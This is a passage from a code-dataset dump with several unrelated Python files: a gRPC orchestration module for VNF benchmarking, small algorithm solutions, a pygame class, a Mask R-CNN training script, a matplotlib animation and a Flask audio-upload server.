logger.info(f\"All instructions built for {role}\")\n else:\n logger.info(f\"Not all instructions built for {role}\")\n\n return instructions, all_instructions_ok\n\n async def call_peer(self, role, address, instruction):\n \"\"\"Performs the call of a instruction in a agent/monitor\n peer.\n\n Arguments:\n role {string} -- The role of the peer being called\n (i.e., agent or monitor)\n address {string} -- The address (ip:port) of the peer\n being called\n instruction {Instruction} -- A gRPC message of type Instruction\n\n Returns:\n Snapshot -- A gRPC message of type Snapshot\n if not exceptions are raised because of grpc error\n or os error\n \"\"\"\n reply = Snapshot(id=instruction.id)\n\n host, port = address.split(\":\")\n channel = Channel(host, port)\n\n if role == \"agent\":\n stub = AgentStub(channel)\n elif role == \"monitor\":\n stub = MonitorStub(channel)\n else:\n stub = None\n logger.info(f\"Could not contact role {role} - no stub/client available\")\n raise (Exception(f\"No stub/client available for {role}\"))\n\n try:\n reply = await stub.CallInstruction(instruction)\n\n except GRPCError as e:\n logger.info(f\"Error in instruction call at {address}\")\n logger.debug(f\"Exception: {repr(e)}\")\n raise (e)\n\n except OSError as e:\n logger.info(f\"Could not open channel for instruction call at {address}\")\n logger.debug(f\"Exception: {repr(e)}\")\n raise (e)\n\n channel.close()\n return reply\n\n async def call_instructions(self, instructions, peers):\n \"\"\"Schedule and calls all the instructions in the proper\n set of peers.\n Not necessarily returns all the snapshots obtained from the\n execution of instructions. As a Instruction might trigger an\n exception, only returns the set of snapshots correctly obtained\n\n Arguments:\n instructions {dict} -- Set of instructions (indexed by the peer uuid\n where it must be called) to be executed on remote peers\n peers {dict} -- Set of peers where instructions must be executed\n\n Returns:\n list -- Set of snapshots obtained from the execution of\n instructions\n \"\"\"\n logger.info(f\"Calling instructions\")\n snapshots = []\n coros = []\n\n for uuid, instruction in instructions.items():\n peer = peers.get(uuid)\n role = peer.get(\"role\")\n address = peer.get(\"address\")\n logger.info(\n f\"Scheduled instruction call on: {role} uuid {uuid} at {address}\"\n )\n\n aw = self.call_peer(role, address, instruction)\n coros.append(aw)\n\n logger.info(f\"Calling all instructions\")\n snaps = await asyncio.gather(*coros, return_exceptions=True)\n peer_uuids = list(instructions.keys())\n\n logger.info(f\"Validating snapshots\")\n for snap in snaps:\n snap_index = snaps.index(snap)\n uuid = peer_uuids[snap_index]\n\n if isinstance(snap, Exception):\n instruction = instructions[uuid]\n logger.info(f\"Snapshot fail from uuid {uuid}\")\n logger.debug(f\"Exception: {repr(snap)}\")\n logger.debug(f\"Instruction: {instruction}\")\n\n snapshot_err = Snapshot(\n id=instruction.id, trial=instruction.trial, error=repr(snap)\n )\n snapshots.append(snapshot_err)\n else:\n logger.info(f\"Snapshot ok from uuid {uuid}\")\n snapshots.append(snap)\n\n return snapshots\n\n async def trial(self, trial, instructions, peers):\n \"\"\"Run a single trial - Calls all the instructions\n needed for a trial in the particular peers\n\n Arguments:\n trial {int} -- Number of the trial being execute\n instructions {dict} -- Set of instructions to be called\n peers {dict} -- Set of peers that instructions will be called\n indexed by uuid\n\n Returns:\n tuple -- (list, bool) A list of Snapshots obtained from\n running the instructions, and a bool indicating if all\n the snapshots were obtained from the instructions called\n \"\"\"\n\n instruction_ids = []\n\n for intruction in instructions.values():\n intruction.id = self.instructions_ids\n intruction.trial = trial\n instruction_ids.append(self.instructions_ids)\n self.instructions_ids += 1\n\n trial_snapshots = await self.call_instructions(instructions, peers)\n\n snap_ids = [snap.id for snap in trial_snapshots]\n snaps_ack = [\n True if inst_id in snap_ids else False for inst_id in instruction_ids\n ]\n snaps_status = all(snaps_ack)\n\n return trial_snapshots, snaps_status\n\n async def trials(self, trials, instructions, peers):\n \"\"\"Runs all the trials needed for a set of instructions\n in the selected peers\n\n Arguments:\n trials {int} -- Amount of trials to be run\n instructions {dict} -- Set of instructions to be\n sent for each peer, indexed by the peer uuid\n peers {dict} -- Set of peers identities indexed\n by uuid, to which the instructions are sent\n\n Returns:\n list -- Set of snapshots obtained from running\n each trial, and its instructions\n \"\"\"\n snapshots = []\n\n for trial in range(1, trials + 1):\n logger.info(f\"Trial: {trial} of total {trials}\")\n\n trial_snapshots, snaps_status = await self.trial(trial, instructions, peers)\n\n if snaps_status:\n logger.info(f\"All instructions successfull in trial {trial}\")\n else:\n logger.info(f\"Failed instructions in trial {trial}\")\n\n snapshots.extend(trial_snapshots)\n\n logger.info(f\"Finished trials: {trials}\")\n return snapshots\n\n def report(self, report, snapshots):\n \"\"\"Adds a set of snapshots into a report\n\n Arguments:\n report {Report} -- A gRPC message of type Report\n snapshots {list} -- A set of gRPC messages of type\n Snapshot\n \"\"\"\n logger.info(f\"Building report {report.id} in test {report.test}\")\n\n for snap in snapshots:\n logger.info(f\"Parsing snapshot id {snap.id} into report\")\n report_snap = report.snapshots.get_or_create(snap.id)\n report_snap.CopyFrom(snap)\n\n async def task(self, task):\n \"\"\"Function called when a task gRPC service call\n is performed in the Manager component.\n It performs all the lifecycle of a task, i.e.,\n calls all the trials to run instructions in Agents/Monitors\n And then builds a Report containing all the Snapshots obtained\n\n Arguments:\n task {Task} -- A gRPC message type Task\n\n Returns:\n Snaphot -- A gRPC message type Snapshot\n \"\"\"\n logger.info(\"Received Task\")\n logger.debug(f\"{json_format.MessageToJson(task)}\")\n\n report = Report(id=task.id, test=task.test)\n\n agents_peers = self.status.get_peers(\"role\", \"agent\")\n monitors_peers = self.status.get_peers(\"role\", \"monitor\")\n\n agents_instructions, ai_ok = self.instructions(\n agents_peers, task.agents, \"agents\"\n )\n monitors_instructions, mi_ok = self.instructions(\n monitors_peers, task.monitors, \"monitors\"\n )\n\n if ai_ok and mi_ok:\n trials = task.trials\n logger.info(f\"Executing trials for task {task.id} - trials {trials}\")\n peers = {**agents_peers, **monitors_peers}\n instructions = {**agents_instructions, **monitors_instructions}\n snapshots = await self.trials(trials, instructions, peers)\n self.report(report, snapshots)\n else:\n logger.info(\n f\"Test not executed - instructions not ok for agents {ai_ok} and/or monitors {mi_ok}\"\n )\n logger.info(\n f\"Could not build report for task {task.id} in test {task.test}\"\n )\n\n logger.info(\"Replying Report\")\n report.timestamp.FromDatetime(datetime.now())\n logger.debug(f\"{json_format.MessageToJson(report)}\")\n return report\n\n\nclass PlayerCore(Core):\n def __init__(self, info):\n Core.__init__(self, info)\n\n async def updateGreetings(self, info_str, vnfbd):\n \"\"\"Calls the greet method from the base Core class\n to be used when a new scenario is deployed, so Player\n can contact the Manager component deployed and collects\n its information: apparatus with set of Agents/Monitors info\n\n Arguments:\n info_str {string} -- A JSON string containing all the\n encoded management info of interfaces of Manager/Agents/Monitors\n that must execute peering and retrieve info\n vnfbd {VNFBD} -- A VNFBD object instance that establishes\n the contacts proper definition of interfaces that must\n be reached (i.e., default port numbers)\n \"\"\"\n logger.info(f\"Greetings to deployed scenario contacts\")\n info = json.loads(info_str)\n\n if info:\n contacts = vnfbd.contacts(info)\n else:\n contacts = []\n\n logger.debug(f\"Contacts: {contacts}\")\n\n if contacts:\n greet_info = {\n \"contacts\": contacts,\n \"peers\": contacts,\n }\n await self.greet(greet_info)\n else:\n logger.info(f\"No contacts for greetings in scenario deployed\")\n logger.debug(f\"{info}\")\n\n async def call_scenario(self, command, test, vnfbd):\n \"\"\"Calls a scenario deployment in the gym-infra component\n\n Arguments:\n command {string} -- Defines if the scenario being\n called must be in mode start or stop\n test {int} -- The number of the test case that identifies\n that scenario deployment\n vnfbd {VNFBD} -- A VNFBD object instance from which\n the scenario will be extracted to be deployed\n\n Returns:\n bool -- If the scenario was deployed correctly/successfuly\n or not\n \"\"\"\n logger.info(f\"Calling test {test} scenario - {command}\")\n\n environment = vnfbd.environment()\n env_orchestrator = environment.get(\"orchestrator\")\n env_params = env_orchestrator.get(\"parameters\")\n address = env_params.get(\"address\").get(\"value\")\n host, port = address.split(\":\")\n\n deploy_dict = {\n \"id\": test,\n \"workflow\": command,\n \"scenario\": vnfbd.scenario(),\n \"environment\": environment,\n }\n deploy = json_format.ParseDict(deploy_dict, Deploy())\n\n try:\n channel = Channel(host, port)\n stub = InfraStub(channel)\n built = await stub.Run(deploy)\n\n except GRPCError as e:\n logger.info(f\"Error in scenario deployment\")\n logger.debug(f\"{e}\")\n ack = False\n\n except OSError as e:\n logger.info(f\"Error in channel for scenario deployment\")\n logger.debug(f\"{e}\")\n ack = False\n\n else:\n if built.error:\n ack = False\n logger.info(f\"Scenario deployed error: {built.error}\")\n else:\n ack = True\n logger.info(f\"Scenario deployed: {built.ack}\")\n\n info = built.info\n info = info.decode(\"utf-8\")\n await self.updateGreetings(info, vnfbd)\n finally:\n channel.close()\n\n return ack\n\n async def call_task(self, uuid, task):\n \"\"\"Calls a task in a Manager component\n using a gRPC stub\n\n Arguments:\n uuid {string} -- The uuid of a Manager component\n that is a peer of Player and by whom the Task will\n be executed\n task {Task} -- A gRPC message of type Task that\n the Manager component being called will have to\n execute\n\n Returns:\n dict -- All the information of a Report message\n obtained from a Manager component after running\n the called Task message\n \"\"\"\n logger.info(f\"Calling test task at manager uuid {uuid}\")\n logger.debug(f\"{json_format.MessageToJson(task)}\")\n\n peers = self.status.get_peers(\"role\", \"manager\")\n peer = peers.get(uuid)\n address = peer.get(\"address\")\n host, port = address.split(\":\")\n channel = Channel(host, port)\n\n report_msg = Report(id=task.id, test=task.test)\n\n try:\n stub = ManagerStub(channel)\n report_msg = await stub.CallTask(task)\n\n except GRPCError as e:\n logger.info(f\"Error in task call\")\n logger.debug(f\"{repr(e)}\")\n report_msg = Report(id=task.id, test=task.test, error=repr(e))\n\n except OSError as e:\n logger.info(f\"Error in channel for task call\")\n logger.debug(f\"{repr(e)}\")\n report_msg = Report(id=task.id, test=task.test, error=repr(e))\n\n else:\n logger.debug(f\"Report received\")\n\n finally:\n logger.debug(f\"{json_format.MessageToJson(report_msg)}\")\n report = json_format.MessageToDict(report_msg)\n channel.close()\n\n return report\n\n def task_template(self, vnfbd):\n \"\"\"Build a vnfbd task template\n I.e., selects a particular manager (uuid)\n that satisfies all the proceedings (agents/probers\n and/or monitors/listeners) contained in a\n vnfbd instance that will compose a Task message\n to be sent to that selected Manager.\n\n Arguments:\n vnfbd {VNFBD} -- A VNFBD object instance\n\n Returns:\n tuple -- (string, dict) The string uuid of the\n manage component where the task template must be\n executed/called and the dict containing the task\n template that will compose a Task message\n \"\"\"\n logger.info(\"Building vnfbd task templates\")\n uuid, task_template = None, None\n managers_peers = self.status.get_peers(\"role\", \"manager\")\n\n for manager_uuid, manager in managers_peers.items():\n apparatus = manager.get(\"apparatus\")\n vnfbd_task_template = vnfbd.build_task(apparatus)\n\n if vnfbd_task_template:\n logger.info(\n f\"Instance of vnf-bd satisfied by manager uuid {uuid} apparatus\"\n )\n return manager_uuid, vnfbd_task_template\n\n logger.info(f\"Instance of vnf-bd not satisfied\")\n return uuid, task_template\n\n async def task(self, test, trials, vnfbd):\n \"\"\"Run a vnfbd task for a particular test\n\n Arguments:\n test {int} -- Number of the test case\n trials {int} -- Number of trials that a test case\n must be executed by a Manager component\n vnfbd {VNFBD} -- A VNFBD object instance from which the\n task was generated\n\n Returns:\n dict -- A report dictionary, containing all the\n (possible) snapshots obtained from the execution of the\n vnfbd task\n \"\"\"\n uuid, task_template = self.task_template(vnfbd)\n\n if uuid and task_template:\n logger.info(f\"Building task for test {test} with {trials} trials\")\n\n task = Task(id=test, test=test, trials=trials)\n\n logger.debug(f\"Parsing task template: {task_template}\")\n\n task = json_format.ParseDict(task_template, task)\n report = await self.call_task(uuid, task)\n\n else:\n logger.info(\n f\"Failed to build task for test {test} - no manager apparatus available\"\n )\n report = {\n \"id\": test,\n \"test\": test,\n \"error\": f\"Failed to build task for test {test} - no manager apparatus available\",\n }\n\n return report\n\n async def scenario(self, test, vnfbd_instance, previous_deployment, action):\n \"\"\"Handles the deployment of a scenario for a specific instance\n of a vnfbd, in a particular test case\n\n Arguments:\n test {int} -- The number of the test\n vnfbd_instance {VNFBD} -- A VNFBD object instance\n previous_deployment {bool} -- If a previous deployment exists\n or not\n action {string} -- The action (start or stop) to be taken for\n a given scenario\n\n Returns:\n bool -- If the needed vnfbd scenario action was confirmed or not\n \"\"\"\n\n if action == \"start\":\n if previous_deployment:\n ok = await self.call_scenario(\"stop\", test, vnfbd_instance)\n logger.info(f\"Stopped previous test {test} deployment scenario: {ok}\")\n\n if vnfbd_instance.deploy():\n vnfbd_deployed = await self.call_scenario(\"start\", test, vnfbd_instance)\n logger.info(\n f\"Started test {test} deployment scenario: {vnfbd_deployed}\"\n )\n else:\n vnfbd_deployed = True\n\n elif action == \"stop\":\n ok = await self.call_scenario(\"stop\", test, vnfbd_instance)\n logger.info(f\"Stopped test {test} deployment scenario: {ok}\")\n vnfbd_deployed = ok\n\n else:\n logger.info(\n f\"No action in [start or stop] for test {test} deployment scenario\"\n )\n vnfbd_deployed = False\n\n return vnfbd_deployed\n\n async def tests(self, vnfbd_instance):\n \"\"\"Executes all the vnfbd instance tests\n Each test requires a scenario deployment\n and the call of all its tasks\n\n Arguments:\n vnfbd_instance {VNFBD} -- A VNFBD object instance\n\n Returns:\n tuple -- (list, book) A list of reports output of the\n tasks created from the vnfbd instance, and a bool indicating\n if all the tasks were performed successfuly\n \"\"\"\n\n tests = vnfbd_instance.tests()\n trials = vnfbd_instance.trials()\n reports_ok = {}\n reports = []\n vnfbd_deployed = False\n\n logger.info(f\"Starting vnf-bd instance tests {tests} - trials {trials}\")\n\n for test in range(1, tests + 1):\n logger.info(\n f\"Starting test {test} out of {tests} in total - trials {trials}\"\n )\n reports_ok[test] = False\n\n vnfbd_deployed = await self.scenario(\n test, vnfbd_instance, vnfbd_deployed, action=\"start\"\n )\n if vnfbd_deployed:\n\n report = await self.task(test, trials, vnfbd_instance)\n if report:\n logger.info(f\"Received report in test {test}\")\n reports.append(report)\n reports_ok[test] = True\n else:\n logger.info(f\"Failed report in test {test}\")\n\n else:\n logger.info(f\"Deployment of vnf-bd instance failed in test {test}\")\n\n vnfbd_not_deployed = await self.scenario(\n test, vnfbd_instance, vnfbd_deployed, action=\"stop\"\n )\n logger.info(f\"Stopped deployment of vnfbd scenario: {vnfbd_not_deployed}\")\n\n logger.debug(f\"Status tests reports: {reports_ok}\")\n if all(reports_ok.values()):\n all_reports_ok = True\n else:\n all_reports_ok = False\n\n logger.info(f\"Ending vnf-bd instance tests - all reports ok: {all_reports_ok}\")\n return reports, all_reports_ok\n\n async def vnfbd(self, vnfbd):\n \"\"\"Executes all the possible instances of\n a vnfbd. Each instance is obtained from the\n possible mutiplexing of inputs for a vnfbd\n\n Arguments:\n vnfbd {VNFBD} -- A VNFBD object instance\n\n Returns:\n list -- A set of reports obtained from the\n execution of the tests of vnfbd instances\n \"\"\"\n logger.info(\"Starting vnf-bd instance execution\")\n all_reports = []\n\n reports, ack = await self.tests(vnfbd)\n\n if not ack:\n logger.info(f\"Error in vnf-bd instance - missing reports\")\n else:\n all_reports.extend(reports)\n\n logger.info(\"Finishing vnf-bd instance execution\")\n return all_reports\n\n def vnfpp(self, reports):\n \"\"\"From the set of reports obtained\n from the tasks generated and executed based\n on a VNF-BD, creates a VNF-PP\n\n Arguments:\n vnfbd {VNFBD} -- A VNFBD object instance\n reports {list} -- A list of reports, output\n of the tasks generated from the execution of\n the vnfbd\n\n Returns:\n VNFPP -- A VNFPP object instance containing\n all the reports and the headers obtained from the\n vnfbd.\n \"\"\"\n vnfpp = VNFPP()\n vnfpp.load_reports(reports)\n return vnfpp\n\n async def vnfbr(self, vnfbr):\n\n for vnfbd in vnfbr.instances():\n reports = await self.vnfbd(vnfbd)\n vnfpp = self.vnfpp(reports)\n vnfbr.add_output(vnfbd, vnfpp)\n\n async def layout(self, message):\n \"\"\"Called when a Player receives a gRPC service call\n of Layout type. It means it must run the VNF-BD inside\n the Layout and return a Result type of gRPC message\n\n Arguments:\n message {Layout} -- A gRPC message of type Layout\n containing a VNF-BR, the inputs part of it\n\n Returns:\n Result -- A gRPC message of type Result.\n It contains the obtained VNF-BR outputs\n \"\"\"\n logger.info(\"Received Layout\")\n logger.debug(f\"{json_format.MessageToJson(message)}\")\n\n result = Result(id=message.id)\n result.timestamp.FromDatetime(datetime.now())\n\n vnfbr_model = message.vnfbr\n\n vnfbr = VNFBR()\n init_ok = vnfbr.from_protobuf(vnfbr_model)\n\n if init_ok:\n logger.info(\"Init vnfbr successful\")\n await self.vnfbr(vnfbr)\n vnfbr.build()\n vnfbr_protobuf = vnfbr.protobuf()\n result.vnfbr.CopyFrom(vnfbr_protobuf)\n result.timestamp.FromDatetime(datetime.now())\n\n else:\n logger.info(\"Could not init vnfbr - empty result\")\n\n logger.info(\"Replying Result\")\n logger.debug(f\"{json_format.MessageToJson(result)}\")\n return result\n","sub_path":"gym/common/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":40467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374427362","text":"N = int(input())\ns = sorted([int(input()) for _ in range(N)])\n\nall_10 = True\nfor i in range(N):\n if s[i] % 10 != 0:\n all_10 = False\n\nif all_10:\n print(0)\n exit()\n\nsum_s = sum(s)\n\nif sum_s % 10 != 0:\n print(sum_s)\nelse:\n for i in range(N):\n if s[i] % 10 != 0:\n print(sum_s - s[i])\n break\n","sub_path":"Python_codes/p03699/s067517736.py","file_name":"s067517736.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614138143","text":"from pygame import *\r\nfrom pyganim import *\r\nimport entity\r\nfrom math import cos, sin\r\n\r\nclass Throwable(entity.Entity):\r\n\t# Any throwable stuff\r\n\t# This class should be extended (and will be), adapted to every specif object\r\n\t# in which it belogs, like granades, tomahawks, knifes, etc.\r\n\t\"\"\"docstring for Throwable\"\"\"\r\n\tdef __init__(self, x, y, speed, weight, angle, image):\r\n\t\tentity.Entity.__init__(self, x, y, image)\r\n\r\n\t\t# In fact, this isn't a 'weight' value, is just that heavier objects should \r\n\t\t# travel less distances. So I put this as a value indicating the 'falling speed', or else.\r\n\t\tself.damping = 0.5 # Floor friction\r\n\t\tself.weight = weight\r\n\t\tself.hVelocity = speed*cos(angle) # Horizontal velocity\r\n\t\tself.vVelocity = speed*sin(angle) # Vertical velocity\r\n\t\t#self.vVelocity *= -1 # Up direction\r\n\r\n\t\tself.ghostRect = (self.rect.centerx - self.hVelocity, self.rect.centery + self.vVelocity)\r\n\t\tself.nextMovement = False\r\n\r\n\tdef motion(self, floorGroup):\r\n\t\tself.move(-self.hVelocity, self.vVelocity)\r\n\t\tself.vVelocity += self.weight\r\n\t\tfor eachfloor in floorGroup:\r\n\t\t\tif sprite.collide_rect(self, eachfloor):\r\n\t\t\t\tself.vVelocity *= -0.85\r\n\t\t\t\tself.hVelocity *= self.damping\r\n\t\t","sub_path":"throwable.py","file_name":"throwable.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209174984","text":"from os import listdir\nfrom xml.etree import ElementTree\nfrom numpy import zeros\nfrom numpy import asarray\nfrom mrcnn.utils import Dataset\nfrom matplotlib import pyplot\nfrom mrcnn.model import MaskRCNN\n\n\n# 定义并加载安全帽数据集的类\nclass HelmetDataset(Dataset):\n # 加载数据集定义\n def load_dataset(self, dataset_dir, is_train=True):\n # 定义一个类\n self.add_class(\"dataset\", 1, \"Helmet\")\n # 定义数据所在位置\n images_dir = dataset_dir + '/JPEGImages/'\n annotations_dir = dataset_dir + '/Annotations/'\n # 定位到所有图像\n for filename in listdir(images_dir):\n # 提取图像 id\n image_id = filename[:-4]\n # 如果我们正在建立的是训练集,略过 350 序号之后的所有图像\n if is_train and int(image_id) >= 350:\n continue\n # 如果我们正在建立的是测试/验证集,略过 350 序号之前的所有图像\n if not is_train and int(image_id) < 350:\n continue\n if int(image_id) >= 500:\n continue\n img_path = images_dir + filename\n ann_path = annotations_dir + image_id + '.xml'\n # 添加到数据集\n self.add_image('dataset', image_id=image_id, path=img_path, annotation=ann_path)\n\n # 从注解文件中提取边框值\n def get_position(self, filename):\n # 加载并解析文件\n tree = ElementTree.parse(filename)\n # 获取文档根元素\n root = tree.getroot()\n # 提取出每个 bounding box 元素\n boxes = list()\n for box in root.findall('.//bndbox'):\n xmin = int(box.find('xmin').text)\n ymin = int(box.find('ymin').text)\n xmax = int(box.find('xmax').text)\n ymax = int(box.find('ymax').text)\n coors = [xmin, ymin, xmax, ymax]\n boxes.append(coors)\n # 提取出图像尺寸\n width = int(root.find('.//size/width').text)\n height = int(root.find('.//size/height').text)\n return boxes, width, height\n\n # 加载图像掩膜\n def load_mask(self, image_id):\n # 获取图像详细信息\n info = self.image_info[image_id]\n # 定义盒文件位置\n path = info['annotation']\n # 加载 XML\n boxes, w, h = self.get_position(path)\n # 为所有掩膜创建一个数组,每个数组都位于不同的通道\n masks = zeros([h, w, len(boxes)], dtype='uint8')\n # 创建掩膜\n class_ids = list()\n for i in range(len(boxes)):\n box = boxes[i]\n row_s, row_e = box[1], box[3]\n col_s, col_e = box[0], box[2]\n masks[row_s:row_e, col_s:col_e, i] = 1\n class_ids.append(self.class_names.index('Helmet'))\n return masks, asarray(class_ids, dtype='int32')\n\n # 加载图像引用\n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n\n# 定义模型配置\nclass HelmetConfig(Config):\n # 给配置对象命名\n NAME = \"helmet_cfg\"\n # 类的数量(背景中的 + 袋鼠)\n NUM_CLASSES = 1 + 1\n # 每轮训练的迭代数量\n STEPS_PER_EPOCH = 300\n\n\n# 训练集\ntrain_set = HelmetDataset()\ntrain_set.load_dataset(r'D:\\PersonalDocuments\\VOC2028', is_train=True)\ntrain_set.prepare()\n# 准备测试/验证集\ntest_set = HelmetDataset()\ntest_set.load_dataset(r'D:\\PersonalDocuments\\VOC2028', is_train=False)\ntest_set.prepare()\n# 准备配置信息\nconfig = HelmetConfig()\nconfig.display()\n# 定义模型\nmodel = MaskRCNN(mode='training', model_dir='./', config=config)\n# 加载 mscoco 权重信息,排除输出层\nmodel.load_weights('mask_rcnn_coco.h5', by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\", \"mrcnn_bbox\", \"mrcnn_mask\"])\n# 训练权重(输出层,或者说‘头部’)\nmodel.train(train_set, test_set, learning_rate=config.LEARNING_RATE, epochs=5, layers='heads')\n\n# 加载图像\nimage_id = 0\nimage = train_set.load_image(image_id)\nprint(image.shape)\n# 加载图像掩膜\nmask, class_ids = train_set.load_mask(image_id)\nprint(mask.shape)\n\n\"\"\"\n# 绘制最开始的几张图像\nfor i in range(9):\n # 定义子图\n pyplot.subplot(330 + 1 + i)\n # 绘制原始像素数据\n image = train_set.load_image(i)\n pyplot.imshow(image)\n # 绘制所有掩膜\n mask, _ = train_set.load_mask(i)\n for j in range(mask.shape[2]):\n pyplot.imshow(mask[:, :, j], cmap='gray', alpha=0.3)\n# 展示绘制结果\npyplot.show()\n\"\"\"","sub_path":"Train/Train-not-working.py","file_name":"Train-not-working.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"155045660","text":"from collections import Counter\nfrom collections import namedtuple\nfrom random import randint\n\nimport matplotlib.pyplot as plt\nimport mpl_toolkits.mplot3d.axes3d as p3\nimport matplotlib.animation as animation\n\n\nCategory = namedtuple('Category', ['name', 'rank'])\nWarehouse = namedtuple('Warehouse', ['name', 'rank'])\nBar = namedtuple('Bar', ['instance', 'height'])\nDataRow = namedtuple('DataRow', ['category', 'warehouse'])\n\nCATEGORIES = [Category('C_NAME', i) for i in range(20)] # cats ranking\nWAREHOUSES = [Warehouse('W_NAME', i) for i in range(20)] # warehouses ranking\n\nc_count = len(CATEGORIES)\nwh_count = len(WAREHOUSES)\n\nROWS_COUNT = 100 # number of rows to render in test case\n\nDATA = [DataRow(randint(0, c_count), randint(0, wh_count)) for i in range(ROWS_COUNT)] # test data\n\nCOLOR_MAP = {} # can specify colors for certain cat / wh\nCACHE_CHUNK_SIZE = 5\n\n\n# define update function\ndef update(num, bars_collection: dict) -> dict:\n cache = [DATA.pop(0) for i in range(CACHE_CHUNK_SIZE) if DATA]\n if cache:\n prepared_cache = Counter(cache)\n for row, count in prepared_cache.items():\n if row in bars_collection:\n current_bar: Bar = bars_collection[row]\n bars_collection[row]: dict = Bar(ax.bar3d(\n row.category, row.warehouse, 0, 1, 1, current_bar.height + count,\n color=COLOR_MAP.get(row, 'b'),\n alpha=0.8), current_bar.height + count)\n else:\n bars_collection[row] = Bar(ax.bar3d(\n row.category, row.warehouse, 0, 1, 1, 1,\n color=COLOR_MAP.get(row, 'b'),\n alpha=0.2), 1) # tuple\n\n return bars_collection\n\n# create figure\nfig = plt.figure()\nax = p3.Axes3D(fig)\n\nline_ani = animation.FuncAnimation(fig, update, 100, fargs=[dict()], interval=50, blit=False)\n\n# add labels\nax.w_xaxis.set_ticklabels([c.name for c in CATEGORIES])\nax.w_yaxis.set_ticklabels([w.name for w in WAREHOUSES])\nax.set_xlabel('Categories')\nax.set_ylabel('Warehouses')\nax.set_zlabel('SKU count')\n\n# perform\nplt.show()","sub_path":"scripts/3D-plot.py","file_name":"3D-plot.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"128492625","text":"import wave, aifc, sys, struct, json, os\n\nfrom flask import Flask, redirect, request, url_for, render_template\nfrom werkzeug import secure_filename\n\nUPLOAD_FOLDER = '/tmp/'\nALLOWED_EXTENSIONS = set(['wav','wave', 'aif', 'aiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n@app.route('/')\ndef main_page():\n return redirect('/analyze.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload_file():\n from jinja2 import FileSystemLoader\n app.jinja_loader = FileSystemLoader(\n os.path.join(os.path.dirname(__file__), '..'))\n\n soundfile = request.files['spikes_file']\n if soundfile and allowed_file(soundfile.filename):\n filename = secure_filename(soundfile.filename)\n soundfile.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return render_template('analyze.html',\n sampleData= provide_json_of_wav(filename))\n else:\n return \"Invalid file\"\n\ndef allowed_file(filename):\n name, extension = filename.rsplit('.', 1)\n return '.' in filename and extension in ALLOWED_EXTENSIONS and name is not ''\n\ndef get_audio_object_for(filename):\n \"return a Wave_read or Aiff object as necessary\"\n if 'wav' in filename:\n # assume we're a wave file\n return wave.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n elif 'aif' in filename:\n return aifc.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\ndef provide_json_of_wav(filename):\n w = get_audio_object_for(filename)\n if w:\n if w.__class__ == wave.Wave_read:\n fmt = \"h\"\n if w.getnchannels() > 1:\n fmt += 'h'\n\n pcm_list = []\n for i in range(w.getnframes()):\n frame = w.readframes(1)\n if len(frame) != struct.calcsize(fmt):\n continue\n pcm_list.append(struct.unpack(fmt, frame)[0])\n\n return json.dumps(pcm_list)\n else:\n return \"Oops!, couldn't read\" + \\\n os.path.join(app.config['UPLOAD_FOLDER'], filename)\n\nif __name__ == '__main__':\n app.config['DEBUG'] = True\n if app.config['DEBUG']:\n from werkzeug import SharedDataMiddleware\n app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {\n '/': os.path.join(os.path.dirname(__file__), '..')\n })\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"594833072","text":"import tkinter as tk\n\n# ボタンを押したときの処理 --- (*1)\ndef calc_bmi():\n # BMIを計算\n h = float(textHeight.get()) / 100\n w = float(textWeight.get())\n bmi = w / h ** 2\n rw = h ** 2 * 22\n per = int(w / rw * 100) - 100\n # 結果をラベルに表示\n s = \"肥満 {0}% (bmi={1})\".format(per, bmi)\n labelResult['text'] = s\n\n# ウィンドウを作成 --- (*2)\nwin = tk.Tk()\nwin.title(\"肥満判定\")\nwin.geometry(\"500x250\")\n\n# 部品を作成 --- (*3)\nlabelHeight = tk.Label(win, text=u'身長(cm):')\nlabelHeight.pack()\n\ntextHeight = tk.Entry(win)\ntextHeight.insert(tk.END, '160')\ntextHeight.pack()\n\nlabelWeight = tk.Label(win, text=u'体重(kg):')\nlabelWeight.pack()\n\ntextWeight = tk.Entry(win)\ntextWeight.insert(tk.END, '70')\ntextWeight.pack()\n\nlabelResult = tk.Label(win, text=u'---')\nlabelResult.pack()\n\ncalcButton = tk.Button(win, text=u'計算')\ncalcButton[\"command\"] = calc_bmi\ncalcButton.pack()\n\n# ウィンドウを動かす\nwin.mainloop()","sub_path":"tkinter/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"207979133","text":"this_line = input().split()\np = int(this_line[0])\ny = int(this_line[1])\n\nans = -1\nwhile(y>p):\n find = True\n\n right = min(p+1, int(y**0.5) + 1)\n\n for i in range(2, right):\n if(y%i==0):\n find = False\n break\n if(find):\n ans = y\n break\n \n y -=1\n\n\n\n\nprint(ans)","sub_path":"937B.py","file_name":"937B.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"132601400","text":"from copy import copy\n\nimport numpy as np\nfrom pycompss.api.api import compss_wait_on\nfrom pycompss.api.parameter import COLLECTION_IN, Depth, Type, 